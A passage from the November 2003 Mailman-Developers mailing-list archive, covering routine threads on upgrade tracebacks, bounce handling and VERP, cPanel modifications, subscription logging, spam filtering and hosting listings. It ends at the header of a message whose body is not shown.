not > updated. How can I check what is missing. > > As far as I know HTML archive updating is done by qrunner. May be some > info about this may also help. > > Best regards, > > Kaan Coskun From mailmandev at whizardries.com Mon Nov 17 15:27:13 2003 From: mailmandev at whizardries.com (Mickey Chandler) Date: Thu Nov 20 09:25:41 2003 Subject: [Mailman-Developers] Subscription Audits? Message-ID: <5.1.0.14.2.20031117141818.04bef8c8@pop.earthlink.net> I've done a couple of searches and noticed that there has been some talk of improving user stats. The wishlist mentions "Keep user-centric stats, such as the date the user was subscribed, the date of their last change to their account, the date they last sent a message through the list. Perhaps also log each message they send through the list." Would it be possible to extend this to a full blown subscription audit trail which would also keep track of how the subscriber subscribed and unsubscribed, what method they used to confirm (email or web), and what IPs those requests came from? With the new anti-spam laws coming into play in California and the EU I'm starting to wonder if the lack of this information will have to force me away from Mailman for an announcements list that my company runs so that I can comply with the various laws. From kcoskun at bilgi.edu.tr Tue Nov 18 02:35:45 2003 From: kcoskun at bilgi.edu.tr (Kaan) Date: Thu Nov 20 09:25:43 2003 Subject: [Mailman-Developers] Re: [Mailman-Users] HTML archives are not updating In-Reply-To: <3FB6022B.40206@bilgi.edu.tr> References: <3FB399F8.7080300@bilgi.edu.tr> <3FB6022B.40206@bilgi.edu.tr> Message-ID: <3FB9CBD1.3010309@bilgi.edu.tr> > Hi, > > I have spotted the problem. It took a few days unfortunately. The > problem was the permissions. When copying from the old server to the new > server permission was changed. > > Since there was a command to check permissions I had the idea of a > problem with in permissions very lately. May be this command may be > modified to check archive folders also. And I could not find any error > messages in the mailman log messages. > > Best Wishes, > > Kaan Coskun > > Kaan wrote: > >> Hi, >> >> I am updating to mailman 2.1.3 from 2.0.13. I have copied the list >> files and archive files to the new machine which mailman 2.1.3 is set >> up. Mail list is functioning. I am sending and receiving mail over >> this mail list. And maillist.mbox files is been updated. But HTML >> archives are not updated. How can I check what is missing. >> >> As far as I know HTML archive updating is done by qrunner. May be some >> info about this may also help. >> >> Best regards, >> >> Kaan Coskun > > From mjinks at uchicago.edu Wed Nov 19 20:06:21 2003 From: mjinks at uchicago.edu (mjinks@uchicago.edu) Date: Thu Nov 20 09:25:45 2003 Subject: [Mailman-Developers] Trouble upgrading from ancient version Message-ID: <20031120010621.GJ25018@uchicago.edu> Hi, all. I may just need to RTFM, but a quick search didn't turn anything up. Pointers are welcome. We have a Mailman 1.0rc2 installation running on Solaris 7, and a Solaris 9 machine that wants to take over the job. Python version is 2.3.2, fresh local compile with no special options at build time. I've copied the lists and archives from the current system, and built Mailman 2.1.3 on the target box. During 'make install', when we try to update the lists, the first one appears to run through okay, though with some strange verbage: Upgrading from version 0xffffffff to 0x20103f0 getting rid of old source files Updating mailing list: 02mdiv Updating the held requests database. - updating old private mbox file looks like you have a really recent CVS installation... you're either one brave soul, or you already ran me - updating old public mbox file Fixing language templates: 02mdiv In fact I don't have a recent CVS version, nor am I all that brave, but moving right along... The next list it tries to update causes grief. Here's the transcript with traceback: Updating mailing list: 1-readamericanren Traceback (most recent call last): File "bin/update", line 570, in ? errors = main() File "bin/update", line 447, in main errors = errors + dolist(listname) File "bin/update", line 187, in dolist mlist = MailList.MailList(listname, lock=0) File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 128, in __init__ self.Load() File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 616, in Load self.CheckVersion(dict) File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 639, in CheckVersion Update(self, stored_state) File "/opt/pkgs/mailman-2.1.3/Mailman/versions.py", line 53, in Update NewRequestsDatabase(l) File "/opt/pkgs/mailman-2.1.3/Mailman/versions.py", line 490, in NewRequestsDatabase l.HoldSubscription(addr, password, digest) TypeError: HoldSubscription() takes exactly 6 arguments (4 given) *** Error code 1 make: Fatal error: Command failed for target `update' Well, I'm clueless. Anybody got any tips? Known issue? PEBCAK? Thanks... -mrj -- Michael Jinks, ENSA, NSIT, University of Chicago "I have seen the future, and it makes no sense." From patudelan at goalsnet.com.pe Fri Nov 14 13:20:16 2003 From: patudelan at goalsnet.com.pe (Pat) Date: Thu Nov 20 09:27:05 2003 Subject: [Mailman-Developers] Re: Mailman-Developers Digest, Vol 175, Issue 14 In-Reply-To: Message-ID: <5.2.1.1.2.20031114131959.009ec770@goalsnet.com.pe> TAKE OFF YOUR LIST >Send Mailman-Developers mailing list submissions to > mailman-developers@python.org > >To subscribe or unsubscribe via the World Wide Web, visit > http://mail.python.org/mailman/listinfo/mailman-developers >or, via email, send a message with subject or body 'help' to > mailman-developers-request@python.org > >You can reach the person managing the list at > mailman-developers-owner@python.org > >When replying, please edit your Subject line so it is more specific >than "Re: Contents of Mailman-Developers digest..." > > >Today's Topics: > > 1. Re: Uncaught bounce notification .. (Martin Maechler) > 2. Re: Uncaught bounce notification .. (J C Lawrence) > 3. Re: Uncaught bounce notification .. (Nigel Metheringham) > > >---------------------------------------------------------------------- > >Message: 1 >Date: Fri, 14 Nov 2003 09:05:48 +0100 >From: Martin Maechler >Subject: Re: [Mailman-Developers] Uncaught bounce notification .. >To: J C Lawrence >Cc: mailman-developers , Martin > Maechler >Message-ID: <16308.36060.659955.861772@gargle.gargle.HOWL> >Content-Type: text/plain; charset=us-ascii > > >>>>> "J" == J C Lawrence > >>>>> on Tue, 11 Nov 2003 09:05:45 -0500 writes: > > J> On Tue, 11 Nov 2003 10:52:07 +0100 > J> Martin Maechler wrote: > > >> My problem is that I get about 50 "Uncaught bounce notification"s per > >> day, only few of which are spam/virus related. > > J> Turn on VERP for a few days. > > J> -- > J> J C Lawrence > J> ---------(*) Satan, oscillate my metallic sonatas. > J> claw@kanga.nu He lived as a devil, eh? > J> http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. > >Thank you, "J", for the suggestion, >but that seems not an option for two reasons > >1) we (currenly must) use sendmail and that doesn't seem to > support VERPing -- or at least we haven't found docu on that > >2) VERP will probably cost quite a bit of CPU/memory/disk-IO > resources on the mail servert. Currently that server almost > constantly runs on load 2.5 -- 3 > (because of anti-virus / anti-spam / mailman ..) > >------ > >OTOH, most of these "uncaught bounce notification" can quite >easily resolved by a human, i.e., the subscriber's e-mail can >very often be found in the bounce. >E.g., if they resend the full headers, I can find the proper >subscriber's address in a "Received:" header such as > >Received: from hypatia.math.ethz.ch (root@hypatia.ethz.ch [129.132.58.23]) > by cryforhelp.mr.itd.umich.edu (umich) with ESMTP id hAB7NrHc014893 > for ; Tue, 11 Nov 2003 02:23:53 -0500 > >(hypatia is our own mail server) > >I.e., I think mailman's analysis of the bounce message leaves >room for improvement. Can you tell me where in the python code >this happens (so we might consider improving it here)? > >Best regards, >and thank you all for mailman! > >Martin Maechler http://stat.ethz.ch/~maechler/ >Seminar fuer Statistik, ETH-Zentrum LEO C16 Leonhardstr. 27 >ETH (Federal Inst. Technology) 8092 Zurich SWITZERLAND >phone: x-41-1-632-3408 fax: ...-1228 <>< > > > >------------------------------ > >Message: 2 >Date: Fri, 14 Nov 2003 08:40:02 -0500 >From: J C Lawrence >Subject: Re: [Mailman-Developers] Uncaught bounce notification .. >To: Martin Maechler >Cc: mailman-developers >Message-ID: <10436.1068817202@kanga.nu> > >On Fri, 14 Nov 2003 09:05:48 +0100 >Martin Maechler wrote: > > "J" == J C Lawrence on Tue, 11 Nov 2003 09:05:45 > > -0500 writes: > >> On Tue, 11 Nov 2003 10:52:07 +0100 Martin Maechler > >> wrote: > > >>> My problem is that I get about 50 "Uncaught bounce notification"s > >>> per day, only few of which are spam/virus related. > > >> Turn on VERP for a few days. > > > 1) we (currenly must) use sendmail and that doesn't seem to support > > VERPing -- or at least we haven't found docu on that > >Mailman's VERP supports don't require VERP support in the MTA, merely >support for plus addressing. > > > 2) VERP will probably cost quite a bit of CPU/memory/disk-IO resources > > on the mail servert. Currently that server almost constantly runs on > > load 2.5 -- 3 (because of anti-virus / anti-spam / mailman ..) > >The added overhead is increased delivery expense in the form of more >disk IO, both for the initial delivery from Mailman, and the final >delivery to the target MX. The other overheads are fairly minimal given >minor MTA tuning. > >-- >J C Lawrence >---------(*) Satan, oscillate my metallic sonatas. >claw@kanga.nu He lived as a devil, eh? >http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. > > > >------------------------------ > >Message: 3 >Date: Fri, 14 Nov 2003 13:48:05 +0000 >From: Nigel Metheringham >Subject: Re: [Mailman-Developers] Uncaught bounce notification .. >To: mailman-developers >Message-ID: <1068817685.18487.17.camel@angua.localnet> >Content-Type: text/plain > >On Fri, 2003-11-14 at 13:40, J C Lawrence wrote: > > On Fri, 14 Nov 2003 09:05:48 +0100 > > Martin Maechler wrote: > > > 2) VERP will probably cost quite a bit of CPU/memory/disk-IO resources > > > on the mail servert. Currently that server almost constantly runs on > > > load 2.5 -- 3 (because of anti-virus / anti-spam / mailman ..) > > > > The added overhead is increased delivery expense in the form of more > > disk IO, both for the initial delivery from Mailman, and the final > > delivery to the target MX. The other overheads are fairly minimal given > > minor MTA tuning. > >Virus/Spam scanning should not be done for mail injection from mailman - >its already been scanned when it came through the MTA on the way into >mailman, so a second scan is completely superfluous and downright silly >when you have expanded the original incoming message into a number of >outgoing ones (even without VERP). > > Nigel. >-- >[ Nigel Metheringham Nigel.Metheringham@InTechnology.co.uk ] >[ - Comments in this message are my own and not ITO opinion/policy - ] > > > > >------------------------------ > >_______________________________________________ >Mailman-Developers mailing list >Mailman-Developers@python.org >http://mail.python.org/mailman/listinfo/mailman-developers > > >End of Mailman-Developers Digest, Vol 175, Issue 14 >*************************************************** From mrjcleaver at yahoo.co.uk Sat Nov 15 10:29:19 2003 From: mrjcleaver at yahoo.co.uk (Martin@Cleaver.org) Date: Thu Nov 20 09:27:07 2003 Subject: Fwd: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? Message-ID: <20031115152919.26555.qmail@web25208.mail.ukl.yahoo.com> Hi Barry, It seems this is the key - you need to open a cpanel account and cpanel needs to treat the Mailman development team as a "licensed cPanel customer". This will enable you to file support requests and see the code that cpanel uses to mould mailman to fit. I appreciate the need to register at the cpanel site. It keeps the signal to noise ratio higher - and approval was quite rapid for me. Note that I cannot request these scripts as I am an end user not a cpanel registeree. Even if I could, the scripts would not mean much to me. I just want my archives to work!!! Best regards and thanks to all, Martin. --- "J. Nick Koston" wrote: > Subject: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & > CPanel? > From: "J. Nick Koston" > To: Martin@Cleaver.org > Date: Sat, 15 Nov 2003 09:54:57 -0500 > > You can get a copy of any patches we have applied by supporting > a ticket > at http://support.cpanel.net > > On Fri, 2003-11-14 at 22:06, Martin@Cleaver.org wrote: > > Nick, > > Has Cpanel documented the changes they have made to > Mailman? If not, can > > Cpanel supply the Mailman dev team with the scripts they use > to mould it to > > fit? > > Cheers, > > Martin. > > -- > > Martin@Cleaver.org - +1 416 832 7759 > > Melbourne Business School FT 2004 MBA Exchange Participant to > Rotman > > > > > > > > =-----Original Message----- > > =From: Bob Puff@NLE [mailto:bob@nleaudio.com] > > =Sent: Friday, 14 November 2003 8:20 PM > > =To: Martin@Cleaver.org; 'Barry Warsaw' > > =Cc: 'J. Nick Koston'; mailman-developers@python.org; > serafin@eryxma.com > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] > Mailman & CPanel? > > = > > = > > =The problem with cpanel is that it messes with the program > configs in order > > =to > > =mould things into its proprietary setup. Once that way, its > hard to mess > > =with > > =things, because they are not as they would normally be set > up in a standard > > =install. So in this example, the Mailman install is NOT the > same as you > > =would > > =find on a webhost without cpanel. > > = > > =Its ok for people who just want to set up a server and let > their users > > =modify > > =basic stuff, but its not for those who want to install > custom software, or > > =tweak stuff. I tried it on a box a while ago, and promptly > reformatted > > =after > > =trying to figure out where they moved stuff, etc... > > = > > =Bob > > = > > = > > =---------- Original Message ----------- > > =From: > > =To: "'Barry Warsaw'" > > =Sent: Thu, 13 Nov 2003 23:55:32 -0500 > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] > Mailman & CPanel? > > = > > => Hi Barry > > => > > => Ok, many thanks. Please see below for the full message. > You'll note > > => that I'd lost all the text from the message. > > => > > => I'll send you the password for the list in a separate > message. Feel > > => free to look or change the settings, and to create a new > list for > > => testing. All my lists have this problem so I am sure it is > nothing > > => that I have done wrong. > > => > > => I'm using Outlook XP 2002 SP-2, but my users (including > Sean who > > => sent that last message) may be using something different. > > => > > => Thanks and regards, > > => Martin. > > => > > => > > => On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: > > => > > => > Nick / Barry > > => > > => > Can you please at least acknowledge whether this is a > known problem? > > => > > => > Many Thanks, > > => > > => > Martin. > > => > > => > =My main complaint is that the archives don't work with > HTML postings > > => > > => > =rendering the mailing list practically useless. = > > => > > => > =Here's a typical mailing: > > > => http://cp1.myhostdns.org/pipermail/social-announce- > > => ft2004_mbssrc.com/2003-No vember/date.html > > => > > => > = > > => > > => > =Here's my postings to the cpanel site: > > => > > => > = * > > > => http://forums.cpanel.net/showthread.php?s=&threadid=15928 > > => > > => > = > > => > > => > =And I am not alone: > > => > > => > = * > > > => http://forums.cpanel.net/showthread.php?s=&threadid=13383 > > => > > => I'm sorry I can't get into the cpanel forums. > > => > > => But I did look at that Pipermail message (you need to > follow the > > => link to the one page that's in that date index). If I > follow the > > => link to the GIF image, it shows up just fine. > > => > > => Please note that the rendering of messages such as > > => multipart/alternative are depending on list settings that > I can't > > => see, such as which content types to pass or scrub. I also > haven't > > => seen the original message so I don't know how what was > posted > > => matches against the filter_mime_types and pass_mime_types > settings > > => in the Content Filter section. There are also some > site-wide > > => settings which describe how to archive things like HTML > messages, > > => although I don't think that's what's happening here (it > looks more > > => like some unintended content-types are getting scrubbed > out). > > => > > => I can't see any bugs, but your list may not be configured > the way > > => you want it for the types of messages being posted to it. > > => > > => -Barry > > => > > => -- > > => > > => Martin@Cleaver.org - +1 416 832 7759 > > => Melbourne Business School FT 2004 MBA Exchange Participant > to Rotman > > => > > => > > => > > => > > => > > => -----Original Message----- > > => From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] > > => Sent: Wednesday, 5 November 2003 12:22 AM > > => To: Social-announce-ft2004@mbssrc.com > > => Cc: Martin@Cleaver.org; Quan Zhang > > => Subject: [Social-announce-ft2004] East Meets West Lunch > > => > > => > > => > > => Welcome to the launch of the East Meets West Lunch Club!! > Our launch > > => involves a delightful eastern lunch in the city this > coming Monday, > > => 10 November. Our aim is to meet monthly for lunch > alternating > > => between eastern and western themed restaurants. > > => > > => Please join us to explore the city and bridge the cultural > gap. > > => > > => > > => > > => Monday's menu is set at $13 per person; > > => > > => including Chicken with Special Sauce, Sweet and Sour Pork > and Beef with > > => Vegetables, all served with vegetable fried rice. > > => > > => > > => > > => Save December 5 for our next meeting; location to be > announced. > > => > > => > > => > > => Time: 1:30 p.m. > > => > > => Date: 10 November 2003 > > => > > => Place: Num Fong Chinese Restaurant > > => > > => 271 Swanston Street, CBD > > => > > => > > => > > => > > => > > => > > => > > => > > => > > => - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, > > => > > => Mindy Frink and Lisa Stevenson (founding members) > > => > > => > > => > > => > > => > > => RSVP to x.xx > @student.mbs.edu if > > => you plan to join. > > => > > => See you there! > > => > > => > > => > > => > > => > > => > > => > > => > > => > > => Sean Xi Yu WEN > > => > > => MBA - Class of 2004 > > => > > => Melbourne Business School > > =------- End of Original Message ------- > > > > > > > ===== -- Martin@Cleaver.org (please don't reply to @yahoo) ______________________________________________________________________ Post your free ad now! http://personals.yahoo.ca From selph at chgr.mc.vanderbilt.edu Tue Nov 18 15:45:21 2003 From: selph at chgr.mc.vanderbilt.edu (Doug Selph) Date: Thu Nov 20 09:27:10 2003 Subject: [Mailman-Developers] Auto-response Enhancement Request Message-ID: <20C8D3D8-1A08-11D8-8CBD-000393A481EE@chgr.mc.vanderbilt.edu> I have a request for an enhancement to auto-response processing. I use a mailman list for support request submission for our technical services team. The public can post requests to the list, while our tech services team makes up the list membership. I want non-members who post to receive an auto-response stating their message has been received and the request is in the queue. Blah, blah, blah. However, I want to be able to spare our tech services folks from the auto-responses when they post replies to the list, which we do for archival purposes. This seems like a feature that would be useful to others as well. Would it be possible to add an option to exclude list members from auto-responses? I would think a good place for the config setting (in the web interface) would be on the /mailman/admin/listname/autoreply page, just under the auto-response text entry. Proposed verbiage: "Should Mailman exclude posts from list members from auto-response processing?" I'm not a Python programmer, but I have implemented a quick hack for this the ~mailman/Mailman/Handlers/Replybot.py. My hack, though, indiscriminately imposes this behavior on all lists hosted on the server, without consulting any list configuration options, which is obviously not the *best* way to accomplish it for most sites. I'm more than happy to share the code changes with anyone interested, though I don't intend to submit it as a patch. From ssm at fnord.no Tue Nov 18 23:15:37 2003 From: ssm at fnord.no (Stig Sandbeck Mathisen) Date: Thu Nov 20 09:27:12 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: Message-ID: <1069215337.7198.15.camel@localhost> On Mon, 2003-11-17 at 23:52, Richard Barrett wrote: > I guess I cannot understand why you are messing around integrating > SpamAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. > > Or did I miss something important along the way. Figuring out what to send and what to throw away is not up to the incoming mail server to decide. The list administrators should make that decision. Mailman gives each list admin a lot of influence over the specific list configurations. Providing a default action for tagged mail, as well as a chance for the list admin to override the server admin for the list that admin is responsible for saves a lot of work for the application or server administrators. If you use mailman for your abuse, virus, news-abuse and postmaster lists, you need to provide a method for those lists to accept or deny spam on an individual basis without fiddling with the general mail scanning server. These things are best left to the specific list admins. For the other lists, a default setting should be sufficient. -- SSM - Stig Sandbeck Mathisen Trust the Computer, the Computer is your Friend. From terri at zone12.com Thu Nov 20 10:54:39 2003 From: terri at zone12.com (Terri Oda) Date: Thu Nov 20 10:56:13 2003 Subject: [Mailman-Developers] Trouble upgrading from ancient version In-Reply-To: <20031120010621.GJ25018@uchicago.edu> References: <20031120010621.GJ25018@uchicago.edu> Message-ID: <20031120155439.GA766@ostraya.zone12.com> On Wed, Nov 19, 2003 at 07:06:21PM -0600, mjinks@uchicago.edu wrote: > TypeError: HoldSubscription() takes exactly 6 arguments (4 given) > *** Error code 1 > make: Fatal error: Command failed for target `update' > > > Well, I'm clueless. Anybody got any tips? Known issue? PEBCAK? Known issue -- somewhere in the upgrade docs it actually tells you that bad things may happen if you have pending requests, and this is the bad thing that happens. (Yes, it happened to one of the installations I maintain. No, I didn't do the upgrade, but I can hardly blame the person who did for not noticing that little tidbit.) Anyhow, the problem is that the subscriptions now include a "real name" field (can't remember what the other missing field is from 1.*) and the converter doesn't fail gracefully and blank out those fields the way it ought to when converting. When it happened to us, I didn't have time to fuss with the source and there weren't that many pending requests, so I just figured out the affected addresses and we did them manually. So my guess is that your options are: (1) clear the queue from the old installation (2) handle those subscriptions manually and remove the pending info (3) write a patch to convert them automatically The latter's probably not actually that hard and would likely be appreciated by people who follow. :) Terri From barry at python.org Thu Nov 20 16:56:45 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 20 16:56:58 2003 Subject: [Mailman-Developers] Trouble upgrading from ancient version In-Reply-To: <20031120010621.GJ25018@uchicago.edu> References: <20031120010621.GJ25018@uchicago.edu> Message-ID: <1069365405.23962.203.camel@anthem> On Wed, 2003-11-19 at 20:06, mjinks@uchicago.edu wrote: > We have a Mailman 1.0rc2 installation running on Solaris 7, and a > Solaris 9 machine that wants to take over the job. Python version is > 2.3.2, fresh local compile with no special options at build time. > > I've copied the lists and archives from the current system, and built > Mailman 2.1.3 on the target box. During 'make install', when we try to > update the lists, the first one appears to run through okay, though with > some strange verbage: I have no way to test an upgrade from Mailman 1.0 to 2.1.3, and I wouldn't be able to officially support such a thing. However, please try this patch -- it should fix the specific problem you're having but other things may break. If it works for you, I'll commit this to cvs. -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: patch-1.txt Type: text/x-patch Size: 697 bytes Desc: not available Url : http://mail.python.org/pipermail/mailman-developers/attachments/20031120/db3e1325/patch-1.bin From barry at python.org Thu Nov 20 17:07:44 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 20 17:07:51 2003 Subject: [Mailman-Developers] Subscription Audits? In-Reply-To: <5.1.0.14.2.20031117141818.04bef8c8@pop.earthlink.net> References: <5.1.0.14.2.20031117141818.04bef8c8@pop.earthlink.net> Message-ID: <1069366063.23962.206.camel@anthem> On Mon, 2003-11-17 at 15:27, Mickey Chandler wrote: > Would it be possible to extend this to a full blown subscription audit > trail which would also keep track of how the subscriber subscribed and > unsubscribed, what method they used to confirm (email or web), and what IPs > those requests came from? Some of that information is already there. For example, the logs/subscribe file contains a timestamp for each subscription and unsubscription. The latter contains some text about how the unsub occurred (e.g. "admin mass unsub"). The difficulty in adding more information to the subscription logs is in plumbing the information through to the ApprovedAddMember() call, but I'll see if its doable. -Barry From mjinks at uchicago.edu Thu Nov 20 18:07:53 2003 From: mjinks at uchicago.edu (mjinks@uchicago.edu) Date: Thu Nov 20 18:07:58 2003 Subject: [Mailman-Developers] Trouble upgrading from ancient version In-Reply-To: <1069365405.23962.203.camel@anthem> References: <20031120010621.GJ25018@uchicago.edu> <1069365405.23962.203.camel@anthem> Message-ID: <20031120230753.GR25018@uchicago.edu> On Thu, Nov 20, 2003 at 04:56:45PM -0500, Barry Warsaw wrote: > > If it works for you, I'll commit this to cvs. Thanks much. It did get me a different error, at least: Updating mailing list: 1-readamericanren Traceback (most recent call last): File "bin/update", line 570, in ? errors = main() File "bin/update", line 447, in main errors = errors + dolist(listname) File "bin/update", line 187, in dolist mlist = MailList.MailList(listname, lock=0) File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 128, in __init__ self.Load() File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 616, in Load self.CheckVersion(dict) File "/opt/pkgs/mailman-2.1.3/Mailman/MailList.py", line 639, in CheckVersion Update(self, stored_state) File "/opt/pkgs/mailman-2.1.3/Mailman/versions.py", line 53, in Update NewRequestsDatabase(l) File "/opt/pkgs/mailman-2.1.3/Mailman/versions.py", line 476, in NewRequestsDatabase msg = Message.OutgoingMessage(text) AttributeError: 'module' object has no attribute 'OutgoingMessage' *** Error code 1 make: Fatal error: Command failed for target `update' If this one has an obvious fix I'd love to hear about it, but if not, it probably isn't worth any sweat. We're going to take a different tack with this, shut down the production list server for a couple of hours next week to get "non-active" copies of the existing lists for upgrade testing, then again when actual switchover time comes. Thanks again, -mrj -- Michael Jinks, ENSA, NSIT, University of Chicago "I have seen the future, and it makes no sense." From dgc at uchicago.edu Thu Nov 20 19:36:27 2003 From: dgc at uchicago.edu (David Champion) Date: Thu Nov 20 19:37:03 2003 Subject: [Mailman-Developers] Re: "Turing test" to reject email harvesting bots In-Reply-To: <3FB78C1A.5080702@gmx.at> References: <3FB78C1A.5080702@gmx.at> Message-ID: <20031121003627.GJ9121@dust.uchicago.edu> * On 2003.11.16, in <3FB78C1A.5080702@gmx.at>, > > This test may disable users of non graphical web browers or email > only subscribers to subscribe. I've generally found that encoding the address as HTML character entities works fine. I've had a bait address on my web page for quite some time, and it's never received any spam. It's readable to text browsers, it doesn't affect readability with unexpected font sizes, it takes little computation, and it's trivial to write. My address would become: dgc@uchicago.edu I've long favored this approach where display of mail addresses offends people. -- -D. dgc@uchicago.edu University of Chicago > NSIT > VDN > ENSS > ENSA > You are here . . . . . . . always line up dots From barry at python.org Thu Nov 20 22:09:53 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 20 22:09:54 2003 Subject: [Mailman-Developers] Trouble upgrading from ancient version In-Reply-To: <20031120230753.GR25018@uchicago.edu> References: <20031120010621.GJ25018@uchicago.edu> <1069365405.23962.203.camel@anthem> <20031120230753.GR25018@uchicago.edu> Message-ID: <1069384192.3854.4.camel@geddy> On Thu, 2003-11-20 at 18:07, mjinks@uchicago.edu wrote: > msg = Message.OutgoingMessage(text) > AttributeError: 'module' object has no attribute 'OutgoingMessage' > *** Error code 1 > make: Fatal error: Command failed for target `update' > If this one has an obvious fix I'd love to hear about it, but if not, it > probably isn't worth any sweat. We're going to take a different tack > with this, shut down the production list server for a couple of hours > next week to get "non-active" copies of the existing lists for upgrade > testing, then again when actual switchover time comes. Nope, this one's gonna be tougher, so I think I'll punt now. ;) You might have more luck upgrading in two steps. From 1.0 to 2.0, and then to 2.1. -Barry From brett at cloud9.net Thu Nov 20 22:56:30 2003 From: brett at cloud9.net (Brett Dikeman) Date: Thu Nov 20 23:16:59 2003 Subject: [Mailman-Developers] back to square one Message-ID: I thought everything was going great(after I removed all the queue files, after having fixed mm_cfg.py and permissions), until things just ground to a halt again. 400+ files in out, mail's extremely slow- its taking well over 10 minutes from the time postfix calls bin/mailman to when something's logged in logs/post. The qrunner processes are running, and taking a few percent of CPU time, but apparently doing nothing, or next to it. The only error we're getting is every 15 minutes: Nov 20 22:02:55 2003 (18412) No such list "[list": ...with one space after the : I've been unsuccessful in tracking down where that could possibly be coming from.... Brett -- ---- "They that give up essential liberty to obtain temporary safety deserve neither liberty nor safety." - Ben Franklin http://www.users.cloud9.net/~brett/ From onursims at hotmail.com Thu Nov 20 13:03:51 2003 From: onursims at hotmail.com (onur simsek) Date: Thu Nov 20 23:17:21 2003 Subject: [Mailman-Developers] help to a newbie Message-ID: hi everybody, i m working on a school project, "automation of department processes", we are supposed to use mailman and automatically create a mailing list with an interface created by us. simply a text document will be submitted and using the mail adresses, we must create the mailing list. project will be done with java, i checked http://www.gnu.org/software/mailman/site.html but i m not sure the information is enough for me, can anybody help me about this subject thanks onur simsek "Fear gives me wings..." Max Payne _________________________________________________________________ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail From Dale at Newfield.org Fri Nov 21 08:46:29 2003 From: Dale at Newfield.org (Dale Newfield) Date: Fri Nov 21 08:47:31 2003 Subject: [Mailman-Developers] back to square one In-Reply-To: References: Message-ID: On Thu, 20 Nov 2003, Brett Dikeman wrote: > The only error we're getting is every 15 minutes: > Nov 20 22:02:55 2003 (18412) No such list "[list": > ...with one space after the : > I've been unsuccessful in tracking down where that could possibly be > coming from.... That message might come from any of these cgi accesses: ./Mailman/Cgi/admindb.py: syslog('error', 'No such list "%s": %s\n', listname, e) ./Mailman/Cgi/confirm.py: syslog('error', 'No such list "%s": %s', listname, e) ./Mailman/Cgi/edithtml.py: syslog('error', 'No such list "%s": %s', listname, e) ./Mailman/Cgi/listinfo.py: syslog('error', 'No such list "%s": %s', listname, e) ./Mailman/Cgi/options.py: syslog('error', 'No such list "%s": %s\n', listname, e) ./Mailman/Cgi/private.py: syslog('error', 'No such list "%s": %s\n', listname, e) ./Mailman/Cgi/rmlist.py: syslog('error', 'No such list "%s": %s\n', listname, e) ./Mailman/Cgi/subscribe.py: syslog('error', 'No such list "%s": %s\n', listname, e) Is it precisely every 15 minutes? If so it sounds more like a cron job... ...which suggests yet another item that has changed dramatically over the versions--have you adjusted the crontab entries appropriately? Another random thought--have you created the mailman mailing list? (There's a fairly new requirement that you have that single specifically named list from which certain messages get sent.) --- Dale Newfield "They that can give up essential liberty to obtain a little safety deserve neither liberty nor safety." - Benjamin Franklin, on the Statue of Liberty From barry at python.org Fri Nov 21 09:39:20 2003 From: barry at python.org (Barry Warsaw) Date: Fri Nov 21 09:39:29 2003 Subject: [Mailman-Developers] Calling all Mailman hosting sites Message-ID: <1069425559.2383.15.camel@anthem> I've had a lot of requests recently for information about Mailman hosting. As a general rule I don't like to recommend any particular hosting company. But if you do provide Mailman hosting facilities, please make sure you've added yourself to the PythonHosting wiki: http://www.python.org/cgi-bin/moinmoin/PythonHosting I usually point people here for more information, so please make sure you're on that list. Now to check the FAQ and see if it points here... -Barry From Grmajoyce at aol.com Fri Nov 21 11:43:02 2003 From: Grmajoyce at aol.com (Grmajoyce@aol.com) Date: Fri Nov 21 11:51:14 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] Calling all Mailman hosting sites Message-ID: <19f.1d6c62ba.2cef9a96@aol.com> What is mailman hosting? From barry at python.org Fri Nov 21 11:59:37 2003 From: barry at python.org (Barry Warsaw) Date: Fri Nov 21 11:59:43 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] Calling all Mailman hosting sites In-Reply-To: <19f.1d6c62ba.2cef9a96@aol.com> References: <19f.1d6c62ba.2cef9a96@aol.com> Message-ID: <1069433976.2383.58.camel@anthem> On Fri, 2003-11-21 at 11:43, Grmajoyce@aol.com wrote: > What is mailman hosting? Some (usually) commercial company that provides Mailman mailing lists for you, so you don't have to run it on your own servers. -Barry From brad.knowles at skynet.be Fri Nov 21 15:09:41 2003 From: brad.knowles at skynet.be (Brad Knowles) Date: Fri Nov 21 16:08:43 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. In-Reply-To: <016001c3a578$3787c890$1400000a@bigdog> References: <016001c3a578$3787c890$1400000a@bigdog> Message-ID: At 2:43 PM -0700 2003/11/07, Kurt Seifried wrote: > I would make it mailman specific, if it isn't you > may as well call it "mailing lists". There is already an O'Reilly book on this subject, although it doesn't cover mailman. -- Brad Knowles, "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, Historical Review of Pennsylvania. GCS/IT d+(-) s:+(++)>: a C++(+++)$ UMBSHI++++$ P+>++ L+ !E-(---) W+++(--) N+ !w--- O- M++ V PS++(+++) PE- Y+(++) PGP>+++ t+(+++) 5++(+++) X++(+++) R+(+++) tv+(+++) b+(++++) DI+(++++) D+(++) G+(++++) e++>++++ h--- r---(+++)* z(+++) From darsie at gmx.at Tue Nov 25 12:46:40 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Tue Nov 25 12:46:49 2003 Subject: [Mailman-Developers] bugtraq submission 